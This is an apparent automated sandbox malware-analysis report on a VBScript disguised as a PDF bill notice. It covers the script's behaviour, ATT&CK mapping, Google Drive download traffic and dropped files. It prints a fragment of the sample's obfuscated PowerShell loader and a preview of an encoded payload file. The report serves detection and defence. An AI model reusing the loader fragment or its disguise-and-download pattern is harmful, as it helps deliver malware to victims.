c.ba?photoedemolxf ugtpre olodrukkrstormt,inan=ye lodknub ofnaddwsalnandativl atioo besiaacisdd koll&eksori nonddmono =mobil1per ozlaanej marei eforu bl,dycasuiibesnofbinderelfreksvi.ew atret ndsmpredea shi,yspeak5termo8katarvba lopspild5indv hnab bwv ils7 pancqtestu3untemt cleaqin urzemaljh eleasusp f varma semiwspint ';$citronsommerfuglens=shouse 'polit>h rry ';$blyantstifter=shouse ' eosiilaendesoralx.emig ';$qe='bokset';$iceboatsnformationskanalerne='\maskes.lea';lnder (shouse ',ycon$ nlucgoptaglfejlrocoadmbpat iaprosplinnar:tra,iumienbnpneumsin.erediabearelatsu.aglo thern a,rya g,nbbi dsplvanafen vem= advo$var oewhinsnortopvinko :sk smaprea ps andpd skrd v.isastivstc anga aagn+afs u$ enc.ih,uchceilaieallodbkultuo ti.faacleit ambssatl nnkuwaifsuperorangsrpapism stifa and tak ivich omojagthnansk,sepiklkraptearubatnferleaudkanl ideee nitrrbrutanuncliebo,ep ');lnder (shouse ' spre$t rtigr daklfrifio hjerb p riaunim lfling:nytnkpkontor o.enof ededre raunontakrigsbtstegei nchaooblignmyrmesespiesrubefyudlovspur ottropeefingimu ati= some$ opmao palmrautomn forbapuzzltf rskeinh mr .echnnon hecytop.n.opls sladp f ltl logmigrnsktnring(knag $ unsyc,landiteleft hoorr afdeolifebnp isisinterokomplmst ukmfl,trekadetr dionf b.lyuintergforn,lhepateundernp.ncrsunbaf) kytt ');lnder (shouse 'dtu.k[dilatn turtejordbt.hizo.b blisbegruer.porrc risvdeteriindvecmatereacreapsyen obrn.tiexternba.ret videmkoralaancomnforuda bemag f.oreg,lacrbudbr]lengt:acco,:blunkslavspemika c throuokku,rt.bloiavisbtm croyspilip kragrreserobanneti hosoblomscje,nbo rec,la.loi dompr=gumb livs[uns lnloculearbejtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting        		Valid Accounts2
        Command and Scripting Interpreter        		221
        Scripting        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping1
        Security Software Discovery        		Remote ServicesData from Local System1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs8%ReversingLabs
        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs5%VirustotalBrowse

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        drive.usercontent.google.com1%VirustotalBrowse
        drive.google.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        https://apis.google.com0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
        https://www.google.com0%VirustotalBrowse
        https://drive.google.com0%VirustotalBrowse
        http://drive.usercontent.google.com1%VirustotalBrowse
        http://drive.google.com0%VirustotalBrowse
        http://pesterbdd.com/images/Pe7%VirustotalBrowse
        https://drive.usercontent.google.com1%VirustotalBrowse
        https://github.com/Pester/Pester1%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.250.185.206
        		truefalseunknown
        drive.usercontent.google.com
        		216.58.206.65
        		truefalseunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://www.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://drive.usercontent.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmpfalseunknown
        https://go.micropowershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://pesterbdd.com/images/Pepowershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        https://contoso.com/powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://drive.googPpowershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmpfalse
          		unknown
          https://drive.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
          https://drive.usercontent.googhpowershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmpfalse
            		unknown
            https://drive.usercontent.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            http://drive.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmpfalseunknown
            https://aka.ms/pscore68powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://apis.google.compowershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmpfalseunknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            142.250.185.206
            		drive.google.comUnited States
            		15169GOOGLEUSfalse
            216.58.206.65
            		drive.usercontent.google.comUnited States
            		15169GOOGLEUSfalse

            General Information

            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1522523
            Start date and time:2024-09-30 09:58:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 41s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
            renamed because original name is a hash value
            Original Sample Name:11309-pdf.vbs
            Detection:MAL
            Classification:mal100.troj.expl.evad.winVBS@4/4@2/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 8
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            03:59:04API Interceptor45x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            3b5074b1b5d032e5620f69f9f700ff0eUrgent Quotation Notification_pdf.vbsGet hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            http://hrlaw.com.auGet hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            file.exeGet hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            file.exeGet hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            CAPE MARS VSL'S PARTICULARS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.185.206
            • 216.58.206.65
            MV TASOS Vessel's Details.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 142.250.185.206
            • 216.58.206.65
            COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
            • 142.250.185.206
            • 216.58.206.65
            https://okfun188.com/Get hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            https://mukirecords.com/Get hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65
            https://thepeaceapproach.net/Get hashmaliciousUnknownBrowse
            • 142.250.185.206
            • 216.58.206.65

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):1.1940658735648508
            Encrypted:false
            SSDEEP:3:Nlllulbnolz:NllUc
            MD5:F23953D4A58E404FCB67ADD0C45EB27A
            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:@...e................................................@..........

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahap3lvc.vc2.psm1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv2plouf.aj4.ps1

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode

            C:\Users\user\AppData\Roaming\Maskes.lea

            Download File
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):410227
            Entropy (8bit):5.957102992446958
            Encrypted:false
            SSDEEP:12288:dVhovqcGxp1SBpxDr5BeQMTIkcmiDknqP:dVhoZaODlBelchmS3P
            MD5:89FDAFA280B0D5CD9DCE03553A9EAC1D
            SHA1:37ABC1D1A95AADB25C7AD434D668E90D9A4C8784
            SHA-256:37794537620A8DC69D8389B25A0ED40FA0F3774B8E830C1AB4167E76B13FA650
            SHA-512:EF2E4974D76B8AC575B16F6536A94C706A8700D14EEF160AAAA99A235A4C17513ED28CC3E08C30A9AAEE20C523D1833FFBB91F43EB585A9883F9D9F360AB216C
            Malicious:false
            Preview:cQGbcQGbu24TGQDrAvwvcQGbA1wkBOsCX6lxAZu5NgMUfesCFd9xAZuB8aLrNFHrAm6j6wICgYHxlOggLHEBm+sCyTDrAotYcQGbugYUyIXrAtr4cQGbcQGb6wI1JDHK6wLT2nEBm4kUC+sCTTBxAZvR4nEBm3EBm4PBBHEBm+sCcPuB+VJ//wF8zOsCGEZxAZuLRCQE6wLU8XEBm4nD6wK/WesC++uBw42cOQBxAZvrAvgQuglqA8XrAq7F6wLo3YHyoTscQXEBm+sCwkCB8qhRH4TrAiJacQGbcQGb6wK4s3EBm3EBm4sMEOsCQ09xAZuJDBPrAiq/cQGbQusCB/VxAZuB+lzuBAB11usC527rAj/1iVwkDOsCUphxAZuB7QADAABxAZtxAZuLVCQI6wJJdnEBm4t8JARxAZvrAjlfievrAjzFcQGbgcOcAAAAcQGb6wKgN1PrAuqB6wKNfGpA6wKrBXEBm4nrcQGb6wLqQMeDAAEAAACgGwJxAZtxAZuBwwABAADrAtaXcQGbU+sCOejrAkMYietxAZvrAi8wibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCGZpxAZtq/+sCz3brAvcxg8IF6wIDP3EBmzH2cQGbcQGbMclxAZvrAo1gixpxAZvrAnESQXEBm+sCCiY5HAp183EBm+sCFMVGcQGb6wJBBIB8Cvu4dd1xAZtxAZuLRAr86wLEVHEBmynw6wJUhesC6z//0usCMrBxAZu6XO4EAOsClJ/rAptcMcBxAZtxAZuLfCQM6wK/uesCdySBNAe+l0uBcQGb6wLduoPABOsCv6jrAoUqOdB143EBm3EBm4n7cQGb6wInO//XcQGbcQGb2BawSPsergBSSqV1uxaPXFVjTtQ3cvJFueJ4AH8DvUWyFrqQkM63AFemm+ECUA+Mvp1icdYWP4y+xyHoXxYnjL4D2Ul6Fj+MvlH7UXoWirjEmEMAV6IxjrbxckI3ElCDvpfz

            Static File Info

            General

            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):4.890745395745708
            TrID:
            • Visual Basic Script (13500/0) 100.00%
            File name:11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
            File size:76'002 bytes
            MD5:cd9505a0c492be1e52f012f624835147
            SHA1:bece8abdda5efe16102c4c04d66cb1ab644b0046
            SHA256:9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0
            SHA512:b0ab14293923b2ca6a06a0c198b42c8f18d463a2e374e230d6a7f9c13afa49cf4c0c9c87b2c4a9687eb5f6ddf2b7644a1f500cf4077148aaa21a3f23effb00be
            SSDEEP:1536:sHyobezwnrkAkPh3JXNP3kK8A+NtZD8A/KtMNVAf:sHyMCAqhtKNtd8bf
            TLSH:73730B1884C43B3539CF335BED410A35C4B9A4147D93ECAF9DA9063D2019C9BB6BAD6E
            File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

            File Icon

            Icon Hash:68d69b8f86ab9a86

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Sep 30, 2024 09:59:06.278748035 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.278808117 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.278909922 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.286593914 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.286621094 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.945878983 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.946055889 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.947026014 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.947103024 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.950741053 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:06.950754881 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.951035976 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:06.966629028 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:07.007411957 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:07.397559881 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:07.397627115 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:07.397634029 CEST44349704142.250.185.206192.168.2.10
            Sep 30, 2024 09:59:07.397670984 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:07.401304960 CEST49704443192.168.2.10142.250.185.206
            Sep 30, 2024 09:59:07.410797119 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:07.410829067 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:07.410990953 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:07.411183119 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:07.411194086 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:08.053169966 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:08.053319931 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:08.056178093 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:08.056185961 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:08.056437969 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:08.057396889 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:08.103404045 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.512731075 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.512975931 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:10.518484116 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.518589020 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:10.531085968 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.531133890 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.531186104 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:10.531198025 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.531353951 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:10.537130117 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:10.582266092 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602107048 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602180958 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602211952 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602221966 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602233887 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602261066 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602268934 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602274895 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602313995 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602317095 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602328062 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602371931 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602376938 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602420092 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602457047 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602461100 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602471113 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602509022 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602514029 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602545023 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602576971 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602586031 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602591038 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602624893 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602627039 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602633953 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602663994 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602669001 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602710962 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602741957 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602747917 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602752924 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.602783918 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.602790117 CEST44349705216.58.206.65192.168.2.10
